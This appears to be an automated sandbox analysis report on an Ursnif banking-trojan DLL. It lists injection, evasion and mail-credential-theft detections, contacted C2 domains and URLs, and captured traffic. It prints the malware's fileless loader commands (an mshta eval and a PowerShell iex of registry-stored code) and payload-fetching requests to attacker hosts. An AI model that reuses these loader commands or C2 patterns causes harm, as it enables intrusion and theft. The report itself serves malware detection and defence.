Source: explorer.exe, 00000024.00000000.413817757.000000000374F000.00000004.00000001.sdmp	Binary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000024.00000000.413817757.000000000374F000.00000004.00000001.sdmp	Binary or memory string: AASCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000024.00000000.411669645.00000000011B3000.00000004.00000020.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: explorer.exe, 00000024.00000000.430548360.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 00000024.00000002.622481126.00000000053D7000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 00000024.00000000.430548360.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002

Source: C:\Windows\SysWOW64\regsvr32.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Contains functionality to dynamically determine API calls

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_0542556E LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,

2_2_0542556E

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_05401F12 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,

2_2_05401F12

HIPS / PFW / Operating System Protection Evasion:

Changes memory attributes in foreign processes to executable or writable

Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write

Compiles code for process injection (via .Net compiler)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File written: C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.0.cs

Jump to dropped file

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: C:\Windows\explorer.exe EIP: 9B851580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: 9B851580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: 9B851580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: 9B851580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: 9B851580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: 9B851580

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3472 base: EB0000 value: 00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3472 base: 7FFA9B851580 value: EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3472 base: 3020000 value: 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3472 base: 7FFA9B851580 value: 40

Maps a DLL or memory area into another process

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Program Files\internet explorer\iexplore.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 3472
Source: C:\Windows\explorer.exe	Thread register set: target process: 4016
Source: C:\Windows\explorer.exe	Thread register set: target process: 4288
Source: C:\Windows\explorer.exe	Thread register set: target process: 4448
Source: C:\Windows\explorer.exe	Thread register set: target process: 5936
Source: C:\Windows\explorer.exe	Thread register set: target process: 6488
Source: C:\Windows\explorer.exe	Thread register set: target process: 2092

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF6678212E0	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF6678212E0	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: EB0000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFA9B851580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 3020000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFA9B851580

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES78AB.tmp' 'c:\Users\user\AppData\Local\Temp\mu1rnx1a\CSC6647FE8FE542539CE2919E5B6D2D1D.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES8CA0.tmp' 'c:\Users\user\AppData\Local\Temp\yacmzdf3\CSCE6DA2C7C1B814D8F891E10CFF0A5BBCE.TMP'
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: unknown

Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'

Source: explorer.exe, 00000024.00000002.611247225.0000000001640000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000024.00000002.611247225.0000000001640000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000024.00000002.611247225.0000000001640000.00000002.00000001.sdmp	Binary or memory string: SProgram Managerl
Source: explorer.exe, 00000024.00000000.411588453.0000000001128000.00000004.00000020.sdmp	Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000024.00000002.611247225.0000000001640000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000024.00000002.611247225.0000000001640000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_0277A12A cpuid

2_2_0277A12A

Queries the installation date of Windows

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_05405F90 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,

2_2_05405F90

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_027712E8 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

2_2_027712E8

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_0277A12A wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

2_2_0277A12A

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_0277A667 GetVersionExA,wsprintfA,

2_2_0277A667

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Ursnif

Source: Yara match	File source: 00000002.00000003.395542546.00000000042F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328188279.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328320558.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328226726.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328337032.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328359150.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328350143.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328266588.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328300905.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.336044765.0000000004DBB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6448, type: MEMORY

Tries to steal Mail credentials (via file access)

Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality:

Yara detected Ursnif

Source: Yara match	File source: 00000002.00000003.395542546.00000000042F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328188279.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328320558.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328226726.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328337032.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328359150.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328350143.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328266588.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328300905.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.336044765.0000000004DBB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6448, type: MEMORY

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
34.65.144.159	unknown	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false
104.20.184.68	unknown	United States	13335	CLOUDFLARENETUS	false
151.101.1.44	unknown	United States	54113	FASTLYUS	false

Contacted Domains

Name	IP	Active
contextual.media.net	23.210.250.97	true
tls13.taboola.map.fastly.net	151.101.1.44	true
hblg.media.net	23.210.250.97	true
c56.lepini.at	34.65.144.159	true
lg3.media.net	23.210.250.97	true
resolver1.opendns.com	208.67.222.222	true
api3.lepini.at	34.65.144.159	true
geolocation.onetrust.com	104.20.184.68	true
api10.laptok.at	34.65.144.159	true
www.msn.com	unknown	unknown
srtb.msn.com	unknown	unknown
img.img-taboola.com	unknown	unknown
web.vortex.data.msn.com	unknown	unknown
cvision.media.net	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://api3.lepini.at/api1/7SpKvNZQZWoR0wQKCmN1/KD_2BPey7M6A4sknzph/Ip3VpPOQqmnCvT_2B_2BK5/4r2K_2B3wW0f3/JdFGceR8/sN9tQwx3x3JWJ2dzvoaA_2F/7bnKlxAsYe/gSbjUWPJM3O0NeIou/EZHWrqNzUS0t/SJ53k6qr4k5/xiOJ1_2BbyKtK4/Tnf2QRNkKddPRNN_2Fkyp/65kWXGWip9M43opO/J4Nq71H0yPbyFLs/r9xzWAiWquka5b9cWG/7jyYbvLwX/YHG6XBsznTAJKxK3VHeE/SrFheeplHdah6LyL5hX/KC_2BG8oiks28NBuCaE6gf/tQuPh0	false	Avira URL Cloud: safe	unknown

AV Detection:

Found malware configuration

Source: regsvr32.exe.6448.2.memstr

Multi AV Scanner detection for submitted file

Source: NJPcHPuRcG.dll

Virustotal: Detection: 15%

Perma Link

Compliance:

Uses 32bit PE files

Source: NJPcHPuRcG.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Uses new MSVCR Dlls

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Uses secure TLS version for HTTPS connections

Source: unknown	HTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.5:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.5:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49750 version: TLS 1.2

Binary contains paths to debug symbols

Source:	Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000001B.00000002.386301089.000001BF2C130000.00000002.00000001.sdmp, csc.exe, 0000001E.00000002.395773551.0000021C02EB0000.00000002.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000024.00000000.426711747.0000000006FE0000.00000002.00000001.sdmp
Source:	Binary string: ntdll.pdb source: regsvr32.exe, 00000002.00000003.399265085.0000000005970000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: explorer.exe, 00000024.00000003.471981638.0000000006C40000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000002.00000003.399265085.0000000005970000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: explorer.exe, 00000024.00000003.471981638.0000000006C40000.00000004.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000024.00000000.426711747.0000000006FE0000.00000002.00000001.sdmp

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_02773512 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,	2_2_02773512
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05415518 wcscpy,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	2_2_05415518
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05404CF1 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,	2_2_05404CF1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0540B88D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	2_2_0540B88D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0540834C RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,	2_2_0540834C

Source: C:\Windows\SysWOW64\regsvr32.exe

2_2_054016E1

Networking:

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 104.20.184.68 104.20.184.68

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c

Source: global traffic	HTTP traffic detected: GET /api1/QSqnACLeyr6hdgRM/z5FskeEfxxW4Q1R/GsITkxgk46HCnUm5Kd/11eB4QB_2/FS2OIfou_2BVahhCN2i1/lN05g44fSdWuZ34SVM_/2F18tQh3ZP_2B9CZltVRIM/NAJawsHjH4mX4/XILaVciO/5e8TUIFZ7ccd8Dn_2F8wtDN/DA_2BihyHs/BqbIiQ7x5yFYJOUsg/scHsHuDvL_2F/a38zFWCcfG3/xo4sCKeZx_2FgB/qzrd3KTzhXtd1iKJfTVBW/TIaj2x4Rf3CB0n8w/wlBMav7PHwJXLsZ/IliJcWNYhk60Yrdjmm/3OHtbL5dY/ANYcc2W_2Bf_2FIiYenV/jXNvqJX5m02G5/F HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api1/9a3FdV_2FOe2lNWBzywhye/a2rzbdQuOhRbh/1tMI9TP_/2FFHpcEjc2zIsj3nY_2FaRD/bbKOnK6Aw9/T9Li8ZpaG0hs_2FEE/_2B0kgl3vplN/HPMJmXJvTbm/kjHzz19HUtkaT1/4BDTN7ZVSNKtMR3H5nP4a/s8_2F3CxujepwtCo/By36bxNYadNwz_2/FEk2aSXfXLicJH7n4U/7D_2FTfi5/cc2nrD5Ag2qXRkQmnDt6/1GTWH5aoTuyoAdeDUx1/UqFEv13ML45n9P1f5D7a2h/spqio1V138YVU/_2FSoCJL/_2BPfPH_2FwmC1xDPsgb90b/lJFlQYaXBd/gV1Ci2eCEez/TspIchn HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api1/aE3Chvy15YwtGBM5c3w/ZiymrrSsY1vMIEeQ79sLxc/QkfYDB83GeV6h/wfm_2Fba/IxaOhm6BSIFzHirA83QDIG_/2FbmOJUxF8/ud5_2Fql9hZq1SzAT/Mwor9Yan0pTL/Fp7ZNYW1P4i/kA3p_2Ft9A_2Fs/RuUNpyL5CsQBX14_2BDvT/1fDvmlCtb0dss45p/clOsmGOkIAiGzqR/LxhkYHtCoZLc014ID_/2BtL4MOOe/oIJGNpJMiO7LF1VXD1cY/3TSy0R_2FzpOndwhSFh/jEmLA5uqXYEdrQwipf8a_2/FYxkdf4zOPfe0/vr4tnHHd/_2Fh2Azy7z8mKYRQWXwGF6y/SDOEEBL HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
Source: global traffic	HTTP traffic detected: GET /api1/7SpKvNZQZWoR0wQKCmN1/KD_2BPey7M6A4sknzph/Ip3VpPOQqmnCvT_2B_2BK5/4r2K_2B3wW0f3/JdFGceR8/sN9tQwx3x3JWJ2dzvoaA_2F/7bnKlxAsYe/gSbjUWPJM3O0NeIou/EZHWrqNzUS0t/SJ53k6qr4k5/xiOJ1_2BbyKtK4/Tnf2QRNkKddPRNN_2Fkyp/65kWXGWip9M43opO/J4Nq71H0yPbyFLs/r9xzWAiWquka5b9cWG/7jyYbvLwX/YHG6XBsznTAJKxK3VHeE/SrFheeplHdah6LyL5hX/KC_2BG8oiks28NBuCaE6gf/tQuPh0 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0Host: api3.lepini.at
